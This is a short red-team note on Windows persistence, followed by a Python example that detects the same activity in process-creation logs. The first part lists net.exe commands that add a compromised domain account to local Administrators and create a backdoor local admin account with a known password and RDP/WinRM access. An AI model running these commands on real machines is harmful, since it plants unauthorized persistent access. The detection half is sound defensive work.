Persistence
1) Add a domain user we have already compromised as a local admin on the machine. This helps with credential dumping as well.
execute -o net localgroup administrators domain.com\\attacker /add
execute -o net localgroup administrators
2) Create a local user and add it to the local admins and RDP groups
execute -o net user /add userooo "Password123@" /Y
execute -o net localgroup administrators userooo /add
execute -o net localgroup "Remote Desktop Users" userooo /add
execute -o net localgroup "Remote Management Users" userooo /add
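How the commands above look from the detection side, as an added example that is not part of the original notes: it scans process-creation command lines (for instance Windows Security event 4688 or Sysmon event 1, assuming command-line logging is enabled) for `net` invocations that create a local account or add a member to the Administrators, Remote Desktop Users or Remote Management Users groups. The function names, host names and sample records are constructed for illustration.

```python
import re

# Local groups that grant admin, RDP or WinRM access to their members.
WATCHED_GROUPS = {"administrators", "remote desktop users", "remote management users"}
NET_BINARY = re.compile(r"(?:^|[\\/])net1?(?:\.exe)?$", re.IGNORECASE)

def classify(cmdline):
    """Return (action, account, group) for a net.exe account change, else None."""
    argv = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]
    if len(argv) < 3 or not NET_BINARY.search(argv[0]):
        return None
    verb = argv[1].lower()
    switches = {a.lower() for a in argv[2:] if a.startswith("/")}
    operands = [a.lower() for a in argv[2:] if not a.startswith("/")]
    if "/add" not in switches or not operands:
        return None  # e.g. "net localgroup administrators" only lists members
    if verb in ("user", "users"):
        return ("user_created", operands[0], None)
    if verb == "localgroup" and len(operands) >= 2 and operands[0] in WATCHED_GROUPS:
        return ("group_add", operands[1], operands[0])
    return None

def detect(events):
    """Return (host, action, account, group, severity) alerts for time-ordered events."""
    created, seen, alerts = set(), set(), []
    for host, cmdline in events:
        hit = classify(cmdline)
        if hit is None or (host, hit) in seen:  # net.exe re-spawns net1.exe
            continue
        seen.add((host, hit))
        action, account, group = hit
        # Escalate Administrators changes and grants to an account created just before.
        high = group == "administrators" or (host, account) in created
        if action == "user_created":
            created.add((host, account))
        alerts.append((host, action, account, group, "high" if high else "medium"))
    return alerts

# Constructed process-creation records (not real logs).
SAMPLE_EVENTS = [
    ("WS01", r'net user /add userooo "Password123@" /Y'),
    ("WS01", r'C:\Windows\system32\net1 user /add userooo "Password123@" /Y'),
    ("WS01", r'net localgroup administrators'),
    ("WS01", r'net localgroup administrators userooo /add'),
    ("WS01", r'net localgroup "Remote Desktop Users" userooo /add'),
    ("WS01", r'net localgroup administrators domain.com\attacker /add'),
    ("WS02", r'net localgroup "Remote Management Users" helpdesk /add'),
]
```

Command-line matching misses the same changes made through other tools or APIs; Windows Security events 4720 (user account created) and 4732 (member added to a security-enabled local group) record the result regardless of how it was done.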